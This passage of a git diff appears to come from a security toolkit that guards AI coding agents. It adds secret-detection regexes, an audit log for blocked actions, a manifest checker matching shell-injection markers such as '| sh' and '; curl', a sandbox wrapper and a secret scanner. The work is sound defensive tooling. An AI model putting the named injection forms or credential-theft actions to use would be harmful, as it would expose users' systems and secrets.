+' 2>/dev/null
+    return 0
+  fi
+  # No JSON parser: fall back to the raw payload (single-line tokens still match).
+  printf '%s' "$json"
+}
+
 # Emit a PreToolUse deny decision (stdout JSON) and exit 2 (block).
 # Usage: deny "human-readable reason"
+# Writes BOTH the impact metric (a counter) and a structured audit record (the trail).
+# The caller may set COMPASS_AUDIT_TOOL / COMPASS_AUDIT_RULE for richer attribution.
 deny() {
   local reason="$1"
   compass_log_metric block "$reason"
+  compass_log_audit deny "${COMPASS_AUDIT_TOOL:-?}" "${COMPASS_AUDIT_RULE:-guardrail}" "$reason"
   cat <<JSON
 {"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"deny","permissionDecisionReason":$(json_string "$reason")}}
 JSON
@@ -91,4 +129,17 @@ compass_log_metric() {
   { mkdir -p "$home" 2>/dev/null && printf '%s\t%s\t%s\t%s\n' \
       "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$event" "$repo" "$detail" \
       >>"$home/metrics.tsv"; } 2>/dev/null || true
+}
+
+# Append a structured security-audit record (one JSON object per line) for a gated or
+# blocked action — a queryable, SIEM-exportable trail beyond the impact counters.
+# `compass audit-log` reads it. Fields: ts, decision, tool, repo, rule, detail (the
+# detail is a redacted reason — never the raw secret/payload). Never fails the caller.
+compass_log_audit() {
+  local decision="$1" tool="${2:-?}" rule="${3:-?}" detail="${4:-}" home="${COMPASS_HOME:-$HOME/.compass}" repo
+  repo="$(basename "$(git rev-parse --show-toplevel 2>/dev/null || echo "$PWD")")"
+  { mkdir -p "$home" 2>/dev/null && printf '{"ts":%s,"decision":%s,"tool":%s,"repo":%s,"rule":%s,"detail":%s}\n' \
+      "$(json_string "$(date -u +%Y-%m-%dT%H:%M:%SZ)")" "$(json_string "$decision")" "$(json_string "$tool")" \
+      "$(json_string "$repo")" "$(json_string "$rule")" "$(json_string "$detail")" \
+      >>"$home/audit.jsonl"; } 2>/dev/null || true
 }

--- a/plugins/core/hooks/lib/policy.sh
+++ b/plugins/core/hooks/lib/policy.sh
@@ -23,6 +23,29 @@ POLICY_PROTECTED_BRANCHES="main master release production prod develop staging"
 # A *deeper* path (e.g. /usr/local/share/foo) is allowed — only the dir itself or its glob.
 POLICY_SYSTEM_DIRS="/usr /etc /var /bin /sbin /lib /lib64 /lib32 /boot /dev /proc /sys /opt /root /home /System /Library"
 
+# Inline-secret detectors: "name|ERE", one per line. HIGH PRECISION by design —
+# secret_content_findings() runs on the write hot path (protect-paths blocks a
+# Write/Edit that introduces a match), so it only matches structured, unambiguous
+# credential formats, never generic high-entropy strings. Broader/entropy scanning
+# lives in `compass scan` (off the hot path; can shell out to gitleaks).
+POLICY_SECRET_DETECTORS='anthropic-api-key|sk-ant-[A-Za-z0-9_-]{20,}
+openai-api-key|sk-(proj-)?[A-Za-z0-9_-]{32,}
+aws-access-key-id|(AKIA|ASIA)[0-9A-Z]{16}
+aws-secret-access-key|aws_secret_access_key[^A-Za-z0-9]{1,4}[A-Za-z0-9/+]{40}
+gcp-api-key|AIza[0-9A-Za-z_-]{35}
+github-token|gh[posru]_[A-Za-z0-9]{36,}
+github-pat|github_pat_[0-9A-Za-z_]{60,}
+gitlab-pat|glpat-[0-9A-Za-z_-]{20,}
+slack-token|xox[baprs]-[0-9A-Za-z-]{10,}
+stripe-secret-key|[sr]k_live_[0-9A-Za-z]{16,}
+npm-token|npm_[0-9A-Za-z]{36}
+private-key-block|-----BEGIN [A-Z0-9 ]*PRIVATE KEY-----'
+
+# Markers that neutralise a match on the SAME line — placeholders, AWS's documented
+# EXAMPLE key, doc fences, and an explicit `allowlist secret` pragma — so READMEs,
+# fixtures, and templates don't trip the guardrail.
+POLICY_SECRET_ALLOW='allowlist[ _-]?secret|EXAMPLE|example\.com|placeholder|REDACTED|dummy|sample|\bfake|your[_-]|YOUR_|<[A-Za-z0-9_]|xxxxxxxx|\.\.\.'
+
 # ── helpers ──────────────────────────────────────────────────────────────────
 
 # Strip quotes and a trailing slash / glob from a token, so "/usr/", '/usr/*',
@@ -163,4 +186,25 @@ danger_reason() {
   fi
 
   return 0
+}
+
+# ── inline secret content ──────────────────────────────────────────────────────
+# secret_content_findings "<text>"  -> one "rule: redacted…" line per detected
+# secret (empty output = clean). Scans the WHOLE blob once per detector (cost is
+# O(detectors), not O(lines)), so it stays cheap on the write hot path. A match is
+# dropped if its line also carries an allowlist marker, so placeholders and the
+# documented AWS EXAMPLE key never trip it. Tokens are redacted to their first 4
+# chars — a finding tells you the *kind* of secret, never reprints the secret.
+secret_content_findings() {
+  local text="$1" name re hit
+  [ -n "$text" ] || return 0
+  printf '%s\n' "$POLICY_SECRET_DETECTORS" | while IFS='|' read -r name re; do
+    [ -n "$name" ] || continue
+    # matching lines → drop allowlisted lines → extract the offending token
+    hit="$(printf '%s\n' "$text" \
+      | grep -E -- "$re" 2>/dev/null \
+      | grep -Eiv -- "$POLICY_SECRET_ALLOW" 2>/dev/null \
+      | grep -Eo -- "$re" 2>/dev/null | head -1)"
+    [ -n "$hit" ] && printf '%s: %s…\n' "$name" "$(printf '%s' "$hit" | cut -c1-4)"
+  done
 }

--- a/plugins/core/hooks/protect-paths.sh
+++ b/plugins/core/hooks/protect-paths.sh
@@ -30,11 +30,23 @@ TOOL="$(json_get "$INPUT" '.tool_name')"
 # --- File-writing tools: protect secrets and credential stores ----------------
 case "$TOOL" in
   Edit|Write|NotebookEdit|MultiEdit)
+    COMPASS_AUDIT_TOOL="$TOOL"
     FILE="$(json_get "$INPUT" '.tool_input.file_path')"
     [ -z "$FILE" ] && FILE="$(json_get "$INPUT" '.tool_input.notebook_path')"
     [ -z "$FILE" ] && exit 0
     reason="$(secret_file_reason "$FILE")"
-    [ -n "$reason" ] && deny "$reason"
+    [ -n "$reason" ] && { COMPASS_AUDIT_RULE="secret-file-write"; deny "$reason"; }
+    # Inline-secret scan of the content being written (high-precision). Pulls the
+    # real author text (Write.content / Edit.new_string / MultiEdit.edits) with true
+    # newlines, so the per-line allowlist is honest: a placeholder line ('allowlist
+    # secret', EXAMPLE, <...>) is exempt; a real-looking credential elsewhere is still
+    # blocked before it reaches the file.
+    findings="$(secret_content_findings "$(json_write_text "$INPUT")")"
+    if [ -n "$findings" ]; then
+      summary="$(printf '%s' "$findings" | tr '\n' ' ')"
+      COMPASS_AUDIT_RULE="secret-in-content"
+      deny "Refusing to write a file that contains what looks like a live secret — $summary. If it's a placeholder, add an 'allowlist secret' marker on that line; if it's real, keep it out of the repo (env var / secret store)."
+    fi
     exit 0 ;;
 esac
 
@@ -53,7 +65,7 @@ if [ "$TOOL" = "Bash" ]; then
   export POLICY_CURRENT_BRANCH
 
   reason="$(danger_reason "$CMD")"
-  [ -n "$reason" ] && deny "$reason"
+  [ -n "$reason" ] && { COMPASS_AUDIT_TOOL="Bash"; COMPASS_AUDIT_RULE="dangerous-command"; deny "$reason"; }
 fi
 
 exit 0

--- a/plugins/core/skills/harden/SKILL.md
+++ b/plugins/core/skills/harden/SKILL.md
@@ -1,0 +1,80 @@
+---
+name: harden
+description: Run the toolkit's security commands in order to surface secrets, MCP supply-chain issues, install drift, release provenance gaps, and untrusted-code risks before shipping. Use before opening a PR, after adding a dependency, or whenever the security posture needs a fresh check.
+argument-hint: "[optional: -- <cmd> to sandbox-test a specific command]"
+allowed-tools: Read, Grep, Glob, Bash
+---
+
+# Harden — security sweep in five ordered steps
+
+Run each command in sequence. Stop on a non-zero exit and fix the finding before
+proceeding. All five must pass before the branch is considered hardened.
+
+## Steps
+
+### 1 · Secrets — `compass scan --staged`
+Scan the staged diff for secrets at the commit boundary.
+
+```
+compass scan --staged
+```
+
+Exits 0 (clean) or 1 (secrets found). Fix: remove the secret, rotate the
+credential, then re-stage. Add an `# allowlist secret` comment ONLY for
+confirmed test fixtures — never real credentials.
+
+### 2 · MCP supply-chain pins — `scripts/check-mcp.sh`
+Verify every auto-installed MCP server is pinned to an exact version and that
+no `@latest` float or shell-injection marker has crept in.
+
+```
+bash scripts/check-mcp.sh
+```
+
+Exits 0 (pinned + clean) or non-zero (floating version or injection marker).
+Fix: pin the version in `mcp/servers.json` and re-run. (`setup-mcp.sh` runs this
+same audit as a pre-flight, and `compass doctor` includes it.)
+
+### 3 · Install fidelity — `compass drift`
+Check that the installed `~/.claude` config still matches this repo's source.
+Catches hand-edited copies, stale hooks, and non-executable guardrail scripts.
+
+```
+compass drift
+```
+
+Exits 0 (in sync) or non-zero (drift detected). Fix: re-run `quickstart.sh`
+or remove the hand-edited file and let the install re-link it.
+
+### 4 · Release provenance — `compass verify`
+Verify the latest release tarball's keyless SLSA attestation. Requires `gh`.
+
+```
+compass verify
+```
+
+Exits 0 (attestation valid), 77 (gh lacks attestation support — skip), or
+non-zero (attestation missing or invalid). A 77 is a safe skip on old gh
+versions; anything else is a provenance gap to investigate.
+
+### 5 · Untrusted code — `compass sandbox -- <cmd>`
+Run any untrusted command inside a real OS sandbox (no network, writes confined
+to cwd/tmp via bwrap/firejail/sandbox-exec). Required before executing code
+fetched from external sources.
+
+```
+compass sandbox -- <cmd>
+```
+
+Exits 0 (ran confined), 2 (usage error — supply a command), or non-zero if the
+sandboxed command itself fails. If no backend is available the CLI refuses to
+run the command unconfined — install bwrap or firejail first.
+
+## Notes
+- Run the five steps in order; each one gates the next in severity.
+- `compass scan --staged` should also be wired as a pre-commit hook
+  (`compass scan --staged` in `.git/hooks/pre-commit`) for continuous coverage.
+- Security (`compass scan`, `compass verify`) and drift detection (`compass drift`)
+  are also surfaced in `compass dashboard` for a fleet-wide view.
+- This skill does not replace a full `/security-review` — it gates the mechanical
+  checks. Run `/security-review` on the diff for human-judgment findings.

--- a/scripts/check-mcp.sh
+++ b/scripts/check-mcp.sh
@@ -1,0 +1,74 @@
+#!/usr/bin/env bash
+# check-mcp.sh — supply-chain audit for the MCP manifest (mcp/servers.json).
+#
+# The manifest is executed as commands inside TWO tools (Claude Code + Codex), so it
+# is a trust boundary. This gate refuses to ship a manifest that is unpinned or tampered:
+#
+#   1. PINNING   — every auto-registered, executable server (npx/uvx/pip/…) must declare
+#                  a `pin` (version) and carry it in `args`. No `@latest`, no bare floating
+#                  spec. A compromised upstream release (tool-poisoning, CVE-2025-54136) is
+#                  then not auto-pulled on the next launch.
+#   2. INTEGRITY — no shell-injection markers ($( … ), backticks, `| sh`, `; curl …`) in any
+#                  command/args/description/note/setup field (manifest-tamper defense).
+#   3. TRANSPORT — http/sse servers must be https.
+#
+# Exit 0 = clean, 1 = finding(s). Runs from setup-mcp.sh (pre-flight), doctor, and CI.
+set -uo pipefail
+
+REPO="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+MANIFEST="${1:-$REPO/mcp/servers.json}"
+command -v jq >/dev/null || { echo "check-mcp: jq required" >&2; exit 1; }
+[ -f "$MANIFEST" ] || { echo "check-mcp: no manifest at $MANIFEST" >&2; exit 1; }
+
+errors=0
+err()  { printf '  \033[31m✗\033[0m %s\n' "$1"; errors=$((errors + 1)); }
+ok()   { printf '  \033[32m✓\033[0m %s\n' "$1"; }
+
+# Commands whose package args resolve a version at run time (so they must be pinned).
+is_pkg_runner() { case "$1" in npx|uvx|npm|pnpm|yarn|pip|pip3|pipx) return 0 ;; *) return 1 ;; esac; }
+
+printf '\033[1mMCP manifest audit\033[0m  (%s)\n' "${MANIFEST#"$REPO"/}"
+
+names="$(jq -r '.servers | keys[]' "$MANIFEST")"
+for name in $names; do
+  auto="$(jq -r ".servers[\"$name\"].autoRegister // false" "$MANIFEST")"
+  cmd="$(jq -r ".servers[\"$name\"].command // empty" "$MANIFEST")"
+  pin="$(jq -r ".servers[\"$name\"].pin // empty" "$MANIFEST")"
+  argsj="$(jq -r ".servers[\"$name\"].args // [] | join(\" \")" "$MANIFEST")"
+  url="$(jq -r ".servers[\"$name\"].url // empty" "$MANIFEST")"
+
+  # 2 · INTEGRITY — scan every stringy field for shell-injection markers.
+  blob="$(jq -r ".servers[\"$name\"] | [ .command, (.args // [] | join(\" \")), .description, .note, .setup ] | map(select(. != null)) | join(\"\n\")" "$MANIFEST")"
+  if printf '%s' "$blob" | grep -Eq '\$\(|`|\|[[:space:]]*(sudo[[:space:]]+)?[a-z]*sh([[:space:]]|$)|;[[:space:]]*(curl|wget|rm|sh|bash|eval)|&&[[:space:]]*(curl|wget)'; then
+    err "$name: shell-injection marker in a manifest field"
+  fi
+
+  # 3 · TRANSPORT — remote servers must be https.
+  case "$url" in http://*) err "$name: remote URL is http (must be https): $url" ;; esac
+
+  # 1 · PINNING — executable package runners.
+  if is_pkg_runner "$cmd"; then
+    case "$argsj" in *@latest*) err "$name: uses '@latest' (floating) — pin an explicit version" ;; esac
+    if [ "$auto" = true ]; then
+      if [ -z "$pin" ]; then
+        err "$name: auto-registered but no 'pin' (version) declared"
+      else
+        case "$argsj" in *"$pin"*) ok "$name: pinned @ $pin" ;; *) err "$name: declared pin '$pin' is not present in args" ;; esac
+      fi
+    elif [ -n "$pin" ]; then
+      case "$argsj" in *"$pin"*) ok "$name: pinned @ $pin (opt-in)" ;; *) err "$name: declared pin '$pin' is not present in args" ;; esac
+    else
+      ok "$name: opt-in, no pin declared"
+    fi
+  else
+    ok "$name: $cmd (local/remote — no package pin needed)"
+  fi
+done
+
+echo
+if [ "$errors" -eq 0 ]; then
+  printf '\033[32mMCP manifest clean\033[0m — all executable servers pinned, no injection markers.\n'
+  exit 0
+fi
+printf '\033[31mMCP manifest: %d finding(s).\033[0m\n' "$errors"
+exit 1

--- a/scripts/compass-audit-log.sh
+++ b/scripts/compass-audit-log.sh
@@ -1,0 +1,59 @@
+#!/usr/bin/env bash
+# compass-audit-log.sh — read the structured security-audit trail.
+#
+# Every gated/blocked action (a secret write, a dangerous command, a scan hit) is
+# appended as one JSON object per line to $COMPASS_HOME/audit.jsonl by the hooks.
+# This turns "compass blocked N footguns" into evidence you can show a security team
+# or pipe into a SIEM.
+#
+#   compass audit-log                 # the recent trail, as a table
+#   compass audit-log -n 200          # more rows
+#   compass audit-log --since 2026-06-01   # only on/after a date
+#   compass audit-log --json          # raw JSONL (SIEM/jq export)
+set -uo pipefail
+
+HOME_DIR="${COMPASS_HOME:-$HOME/.compass}"
+LOG="$HOME_DIR/audit.jsonl"
+N=50; SINCE=""; JSON=0
+while [ $# -gt 0 ]; do
+  case "$1" in
+    -n|--limit) N="${2:-50}"; shift ;;
+    --since)    SINCE="${2:-}"; shift ;;
+    --json)     JSON=1 ;;
+    -h|--help)  sed -n '2,12p' "$0" | sed 's/^# \{0,1\}//'; exit 0 ;;
+    *) echo "compass audit-log: unknown arg '$1'" >&2; exit 2 ;;
+  esac
+  shift
+done
+
+if [ ! -s "$LOG" ]; then
+  echo "no audit events yet — the trail fills as the guardrail blocks footguns ($LOG)"
+  exit 0
+fi
+
+# Filter by --since (string compare works on ISO-8601 timestamps).
+filtered() {
+  if [ -n "$SINCE" ]; then
+    awk -v s="$SINCE" 'index($0,"\"ts\":\"")>0 { t=$0; sub(/.*"ts":"/,"",t); sub(/".*/,"",t); if (t >= s) print }' "$LOG"
+  else
+    cat "$LOG"
+  fi
+}
+
+if [ "$JSON" = 1 ]; then
+  filtered | tail -n "$N"
+  exit 0
+fi
+
+if command -v jq >/dev/null 2>&1; then
+  printf '\033[1m%-20s  %-7s  %-7s  %-16s  %s\033[0m\n' TIME DECISION TOOL RULE DETAIL
+  filtered | tail -n "$N" | jq -r '[.ts, .decision, .tool, .rule, (.detail|.[0:80])] | @tsv' 2>/dev/null \
+    | while IFS=$'\t' read -r ts dec tool rule detail; do
+        printf '%-20s  %-7s  %-7s  %-16s  %s\n' "${ts%Z}" "$dec" "$tool" "$rule" "$detail"
+      done
+else
+  filtered | tail -n "$N"
+fi
+
+total="$(filtered | grep -c . || true)"
+printf '\n%s event(s)%s\n' "$total" "$([ -n "$SINCE" ] && printf ' since %s' "$SINCE")"

--- a/scripts/compass-drift.sh
+++ b/scripts/compass-drift.sh
@@ -1,0 +1,93 @@
+#!/usr/bin/env bash
+# compass-drift.sh — does the INSTALLED config still match the repo source?
+#
+# `doctor` checks that the install EXISTS; drift checks it's still FAITHFUL — a
+# clobbered symlink, a stale/hand-edited copy, a dangling link, or a guardrail hook
+# that lost its +x bit. The question every dotfile user eventually asks: "is what's
+# running actually what I think it is?" — and a tamper check on the safety hooks.
+#
+#   compass drift            # human report; exit 0 clean, 1 if drifted
+#   compass drift --json     # machine-readable findings
+#
+# Install dirs are overridable for testing: COMPASS_CLAUDE_DIR / COMPASS_CODEX_DIR.
+set -uo pipefail
+
+REPO="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+CLAUDE_DIR="${COMPASS_CLAUDE_DIR:-$HOME/.claude}"
+CODEX_DIR="${COMPASS_CODEX_DIR:-$HOME/.codex}"
+JSON=0; [ "${1:-}" = "--json" ] && JSON=1
+
+errors=0; warns=0; rows=""
+emit() { rows="$rows$1|$2"$'\n'; }
+ok()    { [ "$JSON" = 1 ] || printf '  \033[32m✓\033[0m %s\n' "$1"; emit ok "$1"; }
+warn()  { warns=$((warns + 1));  [ "$JSON" = 1 ] || printf '  \033[33m!\033[0m %s\n' "$1"; emit warn "$1"; }
+drift() { errors=$((errors + 1)); [ "$JSON" = 1 ] || printf '  \033[31m✗ DRIFT\033[0m %s\n' "$1"; emit drift "$1"; }
+
+# Physical absolute path of an existing file or directory (bash 3.2 / macOS friendly).
+abspath() {
+  if [ -d "$1" ]; then ( cd "$1" 2>/dev/null && pwd -P )
+  elif [ -e "$1" ]; then ( cd "$(dirname "$1")" 2>/dev/null && printf '%s/%s\n' "$(pwd -P)" "$(basename "$1")" )
+  fi
+}
+
+[ "$JSON" = 1 ] || printf '\033[1mInstall drift\033[0m  (source: %s)\n' "${REPO}"
+
+# Each ~/.claude/<name> should mirror $REPO/claude/<name> — symlink to it (link mode)
+# or a byte-identical copy (copy mode). Anything else is drift.
+for n in settings.json CLAUDE.md statusline.sh agents commands skills workflows hooks output-styles; do
+  t="$CLAUDE_DIR/$n"; src="$REPO/claude/$n"
+  [ -e "$src" ] || continue   # source doesn't ship this entry → nothing to compare
+  if [ -L "$t" ]; then
+    tgt="$(readlink "$t")"
+    case "$tgt" in /*) ;; *) tgt="$(cd "$(dirname "$t")" 2>/dev/null && cd "$(dirname "$tgt")" 2>/dev/null && pwd -P)/$(basename "$tgt")" ;; esac
+    if [ ! -e "$t" ]; then drift "$n: dangling symlink -> $tgt"; continue; fi
+    if [ "$(abspath "$tgt")" = "$(abspath "$src")" ]; then ok "$n: linked to source"
+    else warn "$n: linked to a DIFFERENT source ($tgt) — not this repo"; fi
+  elif [ -e "$t" ]; then
+    if diff -r -q "$src" "$t" >/dev/null 2>&1; then ok "$n: copy in sync"
+    else drift "$n: differs from source (hand-edited or stale) — re-run 'make install'"; fi
+  else
+    drift "$n: not installed (run 'make install')"
+  fi
+done
+
+# Safety hooks must stay executable — a non-+x guardrail silently fails open.
+hd="$CLAUDE_DIR/hooks"
+if [ -d "$hd" ]; then
+  for h in "$hd"/*.sh; do
+    [ -e "$h" ] || continue
+    [ -x "$h" ] || drift "hook not executable: hooks/$(basename "$h") (guardrail would not run)"
+  done
+fi
+
+# The compass CLI on PATH (optional — informational only).
+cli="$HOME/.local/bin/compass"
+if [ -L "$cli" ] && [ -e "$cli" ]; then ok "CLI: ~/.local/bin/compass -> $(readlink "$cli")"
+elif [ -e "$cli" ]; then warn "CLI: ~/.local/bin/compass exists but isn't our symlink"
+fi
+
+# Codex (light): AGENTS.md should resolve if Codex is wired.
+if [ -e "$CODEX_DIR/AGENTS.md" ] || [ -L "$CODEX_DIR/AGENTS.md" ]; then
+  if [ -e "$CODEX_DIR/AGENTS.md" ]; then ok "codex: AGENTS.md present"
+  else drift "codex: AGENTS.md is a dangling symlink"; fi
+fi
+
+if [ "$JSON" = 1 ]; then
+  printf '{"errors":%d,"warnings":%d,"findings":[' "$errors" "$warns"
+  first=1
+  while IFS='|' read -r kind msg; do
+    [ -n "$kind" ] || continue
+    [ "$first" = 1 ] || printf ','; first=0
+    printf '{"level":"%s","message":%s}' "$kind" "$(printf '%s' "$msg" | sed 's/\\/\\\\/g; s/"/\\"/g; s/.*/"&"/')"
+  done <<EOF
+$rows
+EOF
+  printf ']}\n'
+fi
+
+[ "$JSON" = 1 ] || {
+  echo
+  if [ "$errors" -eq 0 ]; then printf '\033[32mNo drift\033[0m — install matches source (%d warning(s)).\n' "$warns"
+  else printf '\033[31m%d drift finding(s)\033[0m, %d warning(s) — re-run the installer to repair.\n' "$errors" "$warns"; fi
+}
+[ "$errors" -eq 0 ]

--- a/scripts/compass-policy-synth.sh
+++ b/scripts/compass-policy-synth.sh
@@ -28,7 +28,9 @@ esac; done
 
 # ── theme catalog: keyword regex → (rule it would propose) ───────────────────────
 # Tab-separated: id | match-regex | proposed CLAUDE.md rule. Data-driven so it's easy to extend.
-THEMES="$(cat <<'EOF'
+# NB: read -r -d '' (not $(cat <<'EOF')) — bash 3.2 (macOS /bin/bash) mis-parses a
+# heredoc nested in command substitution when the body contains apostrophes.
+IFS= read -r -d '' THEMES <<'EOF' || true
 error-handling	(missing|no|unchecked|swallow).{0,20}(error|err)|ignore[sd]? (the )?error|err != nil	Always check and wrap errors with context (Go: %w); never silently swallow an error path.
 tests	(no|missing|lacks?|untested).{0,20}test|add (a )?test|test coverage|failing.path	New behavior ships with a test for it — including the failure path — before it's called done.
 input-validation	(unvalidated|unsanitized|missing).{0,20}(input|validation)|validate (the )?input	Validate/parse untrusted input at the boundary (zod/pydantic/typed structs) before use.
@@ -39,7 +41,6 @@ concurrency	(race condition|data race|deadlock|unsynchronized|not thread.safe)	P
 perf	(n\+1|unbounded|o\(n\^?2\)|hot path.*alloc|blocking i/o)	Avoid N+1 queries and unbounded growth on hot paths; measure before/after.
 rust-unwrap	\.unwrap\(\)|\.expect\(	No unwrap()/expect() on fallible production paths — propagate with ? and typed errors.
 EOF
-)"
 
 # ── gather the finding corpus ────────────────────────────────────────────────────
 gather() {

--- a/scripts/compass-sandbox.sh
+++ b/scripts/compass-sandbox.sh
@@ -1,0 +1,65 @@
+#!/usr/bin/env bash
+# compass-sandbox.sh — run a command in a REAL OS sandbox: no network by default and
+# writes confined to the working dir + temp. This is the actual containment boundary —
+# unlike protect-paths, which only *reduces footguns* (a regex can't stop a determined
+# or obfuscated payload). Reach for it when an agent (or you) must run untrusted code:
+# a downloaded build, a script you didn't write, repro of a sketchy repo.
+#
+#   compass sandbox -- npm test
+#   compass sandbox --net allow -- ./build.sh      # permit network
+#   compass sandbox --rw /data -- ./tool           # extra writable dir
+#
+# Backends, best first: bubblewrap (bwrap), firejail, macOS sandbox-exec. If NONE is
+# available it REFUSES rather than run unconfined — no fake sandboxing. Exit = the
+# command's exit; 2 = usage error or no backend.
+set -uo pipefail
+
+net=none; rw=()
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --net)     net="${2:-none}"; shift ;;
+    --rw)      rw+=("${2:?--rw needs a DIR}"); shift ;;
+    -h|--help) sed -n '2,13p' "$0" | sed 's/^# \{0,1\}//'; exit 0 ;;
+    --)        shift; break ;;
+    -*)        echo "compass sandbox: unknown flag '$1'" >&2; exit 2 ;;
+    *)         echo "compass sandbox: unexpected arg '$1' (put the command after '--')" >&2; exit 2 ;;
+  esac
+  shift
+done
+[ "$#" -gt 0 ] || { echo "compass sandbox: nothing to run — usage: compass sandbox [--net allow] [--rw DIR] -- CMD..." >&2; exit 2; }
+
+have() { command -v "$1" >/dev/null 2>&1; }
+CWD="$(pwd -P)"; TMP="${TMPDIR:-/tmp}"; TMP="${TMP%/}"
+
+if have bwrap; then
+  args=(--ro-bind / / --dev /dev --proc /proc --tmpfs /tmp --bind "$CWD" "$CWD")
+  [ "$net" = none ] && args+=(--unshare-net)
+  if [ "${#rw[@]}" -gt 0 ]; then for d in "${rw[@]}"; do args+=(--bind "$d" "$d"); done; fi
+  exec bwrap "${args[@]}" -- "$@"
+elif have firejail; then
+  args=(--quiet --private-cwd)
+  [ "$net" = none ] && args+=(--net=none)
+  exec firejail "${args[@]}" -- "$@"
+elif have sandbox-exec; then
+  prof="$(mktemp -t compass-sb.XXXXXX)"
+  {
+    echo '(version 1)'
+    echo '(allow default)'
+    [ "$net" = none ] && echo '(deny network*)'
+    echo '(deny file-write*)'
+    printf '(allow file-write* (subpath "%s") (subpath "%s")' "$CWD" "$TMP"
+    if [ "${#rw[@]}" -gt 0 ]; then for d in "${rw[@]}"; do printf ' (subpath "%s")' "$d"; done; fi
+    echo ' (subpath "/dev") (subpath "/private/tmp") (subpath "/private/var/folders"))'
+  } >"$prof"
+  sandbox-exec -f "$prof" "$@"; rc=$?
+  rm -f "$prof"
+  exit "$rc"
+else
+  cat >&2 <<'MSG'
+compass sandbox: no sandbox backend available — refusing to run unconfined.
+Install one and retry:
+  Linux:  sudo apt install bubblewrap      (or: firejail)
+  macOS:  sandbox-exec is built in (no install needed)
+MSG
+  exit 2
+fi

--- a/scripts/compass-scan.sh
+++ b/scripts/compass-scan.sh
@@ -1,0 +1,174 @@
+#!/usr/bin/env bash
+# compass-scan.sh — secret scanning at the commit boundary.
+#
+# The companion to the protect-paths write-hook: the hook stops an agent from
+# *writing* a secret into a file; `compass scan` stops one from *committing* a
+# secret that's already on disk (yours or an agent's), in a pre-commit hook or CI.
+#
+# The deterministic gate is the built-in, pure detector set in claude/hooks/lib/
+# policy.sh (no dependencies, same rules as the write-hook — what CI relies on).
+# If `gitleaks` is installed it is *also* run for extra depth (entropy + a much
+# larger ruleset); its findings are folded in but its absence never fails the run.
+#
+# Exit status: 0 = clean, 1 = secret(s) found, 2 = usage error. Designed to gate.
+set -uo pipefail
+
+ROOT="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)"
+# shellcheck source=../claude/hooks/lib/common.sh
+. "$ROOT/claude/hooks/lib/common.sh"
+# shellcheck source=../claude/hooks/lib/policy.sh
+. "$ROOT/claude/hooks/lib/policy.sh"
+
+usage() {
+  cat <<EOF
+compass scan — find secrets before they're committed
+
+usage: compass scan [--staged|--diff|--all] [PATH...]
+
+  --staged   scan staged changes (default — pre-commit / CI use)
+  --diff     scan unstaged working-tree changes
+  --all      scan every tracked file in the repo
+  PATH...    scan specific files or directories
+  -h|--help  this message
+
+Exits non-zero if a secret is found, so it gates a commit or pipeline:
+  pre-commit:  compass scan --staged || exit 1
+The built-in detectors are the gate; if gitleaks is installed it adds depth.
+Mark a deliberate placeholder with an 'allowlist secret' comment on its line.
+EOF
+}
+
+mode=staged; paths=(); strict=0
+while [ $# -gt 0 ]; do
+  case "$1" in
+    --staged)            mode=staged ;;
+    --diff|--unstaged)   mode=diff ;;
+    --all)               mode=all ;;
+    --strict)            strict=1 ;;   # let gitleaks findings gate too (non-deterministic)
+    --gate|-q|--quiet)   : ;;   # accepted for symmetry with other compass cmds
+    -h|--help)           usage; exit 0 ;;
+    --)                  shift; while [ $# -gt 0 ]; do paths+=("$1"); shift; done; break ;;
+    -*)                  echo "compass scan: unknown flag '$1'" >&2; usage >&2; exit 2 ;;
+    *)                   paths+=("$1") ;;
+  esac
+  shift
+done
+[ ${#paths[@]} -gt 0 ] && mode=paths
+
+in_git() { git rev-parse --git-dir >/dev/null 2>&1; }
+
+# Turn a unified diff on stdin into a "<file>\t<added-line>" stream (added lines only).
+emit_added() {
+  local line file=""
+  while IFS= read -r line; do
+    case "$line" in
+      '+++ '*) file="${line#+++ }"; file="${file#b/}" ;;
+      '+'*)    printf '%s\t%s\n' "${file:-?}" "${line#+}" ;;
+    esac
+  done
+}
+
+# Read a "<file>\t<line>" stream and print one indented finding per detected secret.
+scan_stream() {
+  local file content one f
+  while IFS=$'\t' read -r file content; do
+    f="$(secret_content_findings "$content")" || true
+    [ -n "$f" ] || continue
+    while IFS= read -r one; do
+      [ -n "$one" ] && printf '  %s\t%s\n' "$file" "$one"
+    done <<EOF
+$f
+EOF
+  done
+}
+
+# Scan whole files (no diff) — fast, one detector pass per file; attributed by name.
+scan_files() {
+  local p f one content
+  for p in "$@"; do
+    [ -f "$p" ] || continue
+    content="$(cat "$p" 2>/dev/null)" || continue
+    f="$(secret_content_findings "$content")" || true
+    [ -n "$f" ] || continue
+    while IFS= read -r one; do
+      [ -n "$one" ] && printf '  %s\t%s\n' "$p" "$one"
+    done <<EOF
+$f
+EOF
+  done
+}
+
+# Resolve the file list for --all / PATH modes (tracked files only when in git).
+resolve_files() {
+  local p
+  if [ "$mode" = all ]; then
+    if in_git; then git ls-files -z | tr '\0' '\n'; fi
+    return
+  fi
+  for p in "${paths[@]}"; do
+    if [ -d "$p" ]; then
+      if in_git; then git ls-files -z -- "$p" | tr '\0' '\n'
+      else find "$p" -type f; fi
+    else
+      printf '%s\n' "$p"
+    fi
+  done
+}
+
+# --- Collect built-in findings -------------------------------------------------
+case "$mode" in
+  staged) findings="$(in_git && git diff --cached --no-color -U0 | emit_added | scan_stream)" ;;
+  diff)   findings="$(in_git && git diff --no-color -U0 | emit_added | scan_stream)" ;;
+  all|paths)
+    files="$(resolve_files)"
+    if [ -n "$files" ]; then
+      # shellcheck disable=SC2046
+      findings="$(IFS=$'\n'; scan_files $files)"
+    else findings=""; fi ;;
+esac
+
+# --- Optional gitleaks depth pass (best-effort; never fails the run) ----------
+gl_note=""
+if have gitleaks; then
+  case "$mode" in
+    staged|diff) gl_out="$(gitleaks git --no-banner --redact -v 2>/dev/null || true)" ;;
+    *)           gl_out="$(gitleaks dir --no-banner --redact -v "${paths[0]:-.}" 2>/dev/null || true)" ;;
+  esac
+  if printf '%s' "$gl_out" | grep -qiE 'secret|finding|rule:'; then
